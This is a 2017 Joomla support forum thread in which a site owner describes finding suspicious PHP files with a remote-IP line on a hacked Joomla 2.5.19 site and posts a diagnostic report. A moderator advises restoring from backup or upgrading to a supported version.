Site Hacked - Help with FPA

Discussion regarding Joomla! 2.5 security issues.

Moderators: Bernard T, mandville, PhilD, fcoulter, General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant / FPA - If you are serious about wanting help, you will use this tool to help you post.
User avatar
purplenova
Joomla! Intern
Joomla! Intern
Posts: 50
Joined: Wed Feb 15, 2012 5:20 pm
Location: Ohio
Contact:

Site Hacked - Help with FPA

Postby purplenova » Tue Mar 07, 2017 7:42 pm

I believe my site was hacked. some folks were getting a 404 error when visiting the site but when I tried initially everything looked ok, but after more hunting I found several php pages that had the "$remote = random ip address using port443. Found this line in 2 separate files .

After a google search or two, I found a research paper where someone spent two years tracking something called Asprox botnet and the paper also referenced the exact same $remote= same ip address, that I found.

Hopefully this is an easy fix.


Problem Description :: Forum Post Assistant (v1.2.8) : 7th March 2017 wrote:found strange php pages in root with remote ip adress
Forum Post Assistant (v1.2.8) : 7th March 2017 wrote:
Basic Environment :: wrote:Joomla! Instance :: Joomla! 2.5.19-Stable (Ember) 6-March-2014
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: 9004202 (uid: /gid: ) | Group: 100450 (gid: ) | Valid For: 2.5
Configuration Options :: Offline: 1 | SEF: 1 | SEF Suffix: 0 | SEF ReWrite: 0 | .htaccess/web.config: No | GZip: 1 | Cache: 2 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: 1 | Unicode Slugs: 0 | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.32-604.30.3.lve1.3.63.el6.nfsfixes.x86_64 | Technology: x86_64 | Web Server: Apache | Encoding: gzip, deflate | Doc Root: /var/chroot/home/content/02/9004202/html | System TMP Writable: Yes

PHP Configuration :: Version: 5.3.24 | PHP API: cgi-fcgi | Session Path Writable: No | Display Errors: 1 | Error Reporting: 22519 | Log Errors To: | Last Known Error: | Register Globals: 0 | Magic Quotes: 1 | Safe Mode: 0 | Open Base: | Uploads: 1 | Max. Upload Size: 32M | Max. POST Size: 33M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 64M

MySQL Configuration :: Version: 5.0.96-log (Client:5.5.19) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 1.91 MiB | #of Tables:  83
Detailed Environment :: wrote:PHP Extensions :: Core (5.3.24) | date (5.3.24) | ereg () | libxml () | openssl () | pcre () | sqlite3 (0.7-dev) | zlib (1.1) | apc (3.1.13) | bcmath () | calendar () | ctype () | curl () | dba () | dom (20031129) | hash (1.0) | fileinfo (1.0.5-dev) | filter (0.11.0) | ftp () | gd () | gettext () | SPL (0.2) | iconv () | imagick (3.1.0RC2) | json (1.2.1) | mbstring () | mcrypt () | mysql (1.0) | mysqli (0.1) | session () | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | standard (5.3.24) | pspell () | Reflection ($Id: 4af6c4c676864b1c0bfa693845af0688645c37cf $) | Phar (2.0.1) | SimpleXML (0.1) | soap () | SQLite (2.0-dev) | exif (1.4 $Id$) | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlrpc (0.51) | xmlwriter (0.1) | xsl (0.1) | zip (1.11.0) | cgi-fcgi () | mhash () | Zend Engine (2.3.0) |
Potential Missing Extensions :: suhosin |

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): No
Potential Ownership Issues: Maybe
Folder Permissions :: wrote:Core Folders :: images/ (705) | components/ (705) | modules/ (705) | plugins/ (705) | language/ (705) | templates/ (705) | cache/ (705) | logs/ (705) | tmp/ (705) | administrator/components/ (705) | administrator/modules/ (705) | administrator/language/ (705) | administrator/templates/ (705) |

Elevated Permissions (First 10) ::
Extensions Discovered :: wrote:Components :: SITE :: com_mailto (2.5.0) 1 | com_wrapper (2.5.0) 1 |
Components :: ADMIN :: com_admin (2.5.0) 1 | Akeeba (4.7.4) 1 | com_banners (2.5.0) 1 | com_cache (2.5.0) 1 | com_categories (2.5.0) 1 | com_checkin (2.5.0) 1 | com_config (2.5.0) 1 | com_content (2.5.0) 1 | com_cpanel (2.5.0) 1 | com_finder (2.5.0) 1 | com_installer (2.5.0) 1 | com_joomlaupdate (2.5.0) 1 | com_languages (2.5.0) 1 | com_login (2.5.0) 1 | com_media (2.5.0) 1 | com_menus (2.5.0) 1 | com_messages (2.5.0) 1 | com_modules (2.5.0) 1 | com_newsfeeds (2.5.0) 1 | com_plugins (2.5.0) 1 | com_redirect (2.5.0) 1 | com_search (2.5.0) 1 | com_templates (2.5.0) 1 | com_users (2.5.0) 1 | com_weblinks (2.5.0) 1 | Admintools (3.4.4) 1 |

Modules :: SITE :: mod_articles_archive (2.5.0) 1 | mod_articles_categories (2.5.0) 1 | mod_articles_category (2.5.0) 1 | mod_articles_latest (2.5.0) 1 | mod_articles_news (2.5.0) 1 | mod_articles_popular (2.5.0) 1 | mod_banners (2.5.0) 1 | mod_breadcrumbs (2.5.0) 1 | mod_custom (2.5.0) 1 | mod_feed (2.5.0) 1 | mod_finder (2.5.0) 1 | mod_footer (2.5.0) 1 | mod_languages (2.5.0) 1 | mod_login (2.5.0) 1 | mod_menu (2.5.0) 1 | mod_random_image (2.5.0) 1 | mod_related_items (2.5.0) 1 | mod_search (2.5.0) 1 | mod_stats (2.5.0) 1 | mod_syndicate (2.5.0) 1 | mod_users_latest (2.5.0) 1 | mod_weblinks (2.5.0) 1 | mod_whosonline (2.5.0) 1 | mod_wrapper (2.5.0) 1 |
Modules :: ADMIN :: mod_custom (2.5.0) 1 | mod_feed (2.5.0) 1 | mod_latest (2.5.0) 1 | mod_logged (2.5.0) 1 | mod_login (2.5.0) 1 | mod_menu (2.5.0) 1 | mod_multilangstatus (2.5.0) 1 | mod_popular (2.5.0) 1 | mod_quickicon (2.5.0) 1 | mod_status (2.5.0) 1 | mod_submenu (2.5.0) 1 | mod_title (2.5.0) 1 | mod_toolbar (2.5.0) 1 | mod_version (2.5.0) 1 |

Plugins :: SITE :: plg_authentication_gmail (2.5.0) 0 | plg_authentication_joomla (2.5.0) 1 | plg_authentication_ldap (2.5.0) 0 | plg_captcha_recaptcha (2.5.0) 1 | plg_content_emailcloak (2.5.0) 1 | plg_content_finder (2.5.0) 0 | plg_content_geshi (2.5.0) 0 | plg_content_joomla (2.5.0) 1 | plg_content_loadmodule (2.5.0) 1 | plg_content_pagebreak (2.5.0) 1 | plg_content_pagenavigation (2.5.0) 1 | plg_content_vote (2.5.0) 1 | plg_editors-xtd_article (2.5.0) 1 | plg_editors-xtd_image (2.5.0) 1 | plg_editors-xtd_pagebreak (2.5.0) 1 | plg_editors-xtd_readmore (2.5.0) 1 | plg_editors_codemirror (1.0) 1 | plg_editors_tinymce (3.5.4.1) 1 | plg_extension_joomla (2.5.0) 1 | plg_finder_categories (2.5.0) 1 | plg_finder_contacts (2.5.0) 1 | plg_finder_content (2.5.0) 1 | plg_finder_newsfeeds (2.5.0) 1 | plg_finder_weblinks (2.5.0) 1 | PLG_JMONITORING_AKEEBABACKUP_T (1.0) 1 | plg_quickicon_extensionupdate (2.5.0) 1 | plg_quickicon_joomlaupdate (2.5.0) 1 | plg_quickicon_akeebabackup (1.0) 1 | plg_search_categories (2.5.0) 1 | plg_search_contacts (2.5.0) 1 | plg_search_content (2.5.0) 1 | plg_search_newsfeeds (2.5.0) 1 | plg_search_weblinks (2.5.0) 1 | plg_system_cache (2.5.0) 0 | plg_system_debug (2.5.0) 1 | plg_system_highlight (2.5.0) 1 | plg_system_languagecode (2.5.0) 0 | plg_system_languagefilter (2.5.0) 0 | plg_system_log (2.5.0) 1 | plg_system_logout (2.5.0) 1 | plg_system_p3p (2.5.0) 1 | plg_system_redirect (2.5.0) 1 | plg_system_remember (2.5.0) 1 | plg_system_sef (2.5.0) 1 | Security - jHackGuard (1.4.2) 1 | System - Admin Tools (3.4.4) 1 | PLG_SYSTEM_BACKUPONUPDATE_TITL (3.7) 1 | plg_user_contactcreator (2.5.0) 0 | plg_user_joomla (2.5.0) 1 | plg_user_profile (2.5.0) 0 |
[quote="Templates Discovered ::"][size=85]Templates :: SITE :: atomic (2.5.0) 1 | beez5 (2.5.0) 1 | beez_20 (2.5.0) 1 | TR_Neutrino (v1.1) 1 |
Templates :: ADMIN :: bluestork (2.5.0) [color=#000000][b]
Last edited by purplenova on Tue Mar 07, 2017 7:47 pm, edited 1 time in total.
Thanks,
Tom

User avatar
sozzled
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 3489
Joined: Sun Jul 05, 2009 3:30 am
Location: Canberra, Australia
Contact:

Re: Site Hacked - Help with FPA

Postby sozzled » Tue Mar 07, 2017 7:44 pm

Please edit your last post, remove the "[ code ]" tag at the beginning and the "[ /code ]" tag at the end so that we can read your FPA report, thank you.

The most likely cause of the way your site was hacked is because you're using J! 2.5.19 which is, as you should know, outdated (over three years old), unsupported and known to be vulnerable to attack. Unfortunately for you, you've paid the price of risking your website to attack by using obsolete and vulnerable software. I feel sorry for you.
https://www.kuneze.com/blog
Former member of Kunena project team
If you think I’m wrong then say “I think you're wrong.” If you say “You’re wrong!”, how do you know?

User avatar
purplenova
Joomla! Intern
Joomla! Intern
Posts: 50
Joined: Wed Feb 15, 2012 5:20 pm
Location: Ohio
Contact:

Re: Site Hacked - Help with FPA

Postby purplenova » Tue Mar 07, 2017 7:54 pm

I knew it was out dated and my host would normally notify me of updates ready for install, so I kinda ignored the situation until I started getting phone calls. A bit late I know.

Other than your obvious observation, is there a remedy for my issue, other than update to latest release, or will that even correct it?
Thanks,
Tom

User avatar
sozzled
Joomla! Virtuoso
Joomla! Virtuoso
Posts: 3489
Joined: Sun Jul 05, 2009 3:30 am
Location: Canberra, Australia
Contact:

Re: Site Hacked - Help with FPA

Postby sozzled » Tue Mar 07, 2017 8:05 pm

There are two ways to remediate the situation; remediate is a great word: it means try to patch things up so that they hang together long enough until you can address the root cause of the problem and fix it properly.

You can restore your website from a backup that you made before the phone calls started happening. This may mean going back to the way your site was operating a few months ago but, at least, it's a start and it'll get you working again (hopefully) for long enough for you to start doing the required work to bring your antiquated J! 2.5.19 website up to "speed" with J! 2.5.28. However, even with J! 2.5.28 you're not free from problems. J! 2.5.28 is also outdated, unsupported and vulnerable to attack.

So there's the band-aid approach.

The way to fix the problem properly is to attempt to salvage as much material that you can and utilise this by creating a website built with the current supported (and less-likely-to-be-attacked) version of Joomla, namely J! 3.6.5. This, of course, means some work but, then again, if something is worthwhile doing then that "something" requires the investment of time, labour (and, perhaps, money).

It all depends, really, on how valuable your website (that's now ruined) was to you and/or your business. I don't know the answer to that; that's something only you can decide.

As a start, you might like to read viewtopic.php?f=714&t=757645
https://www.kuneze.com/blog
Former member of Kunena project team
If you think I’m wrong then say “I think you're wrong.” If you say “You’re wrong!”, how do you know?

User avatar
purplenova
Joomla! Intern
Joomla! Intern
Posts: 50
Joined: Wed Feb 15, 2012 5:20 pm
Location: Ohio
Contact:

Re: Site Hacked - Help with FPA

Postby purplenova » Tue Mar 07, 2017 8:10 pm

sozzled wrote:
As a start, you might like to read viewtopic.php?f=714&t=757645


Thank you !
Thanks,
Tom


Return to “Security in Joomla! 2.5”

Who is online

Users browsing this forum: No registered users and 7 guests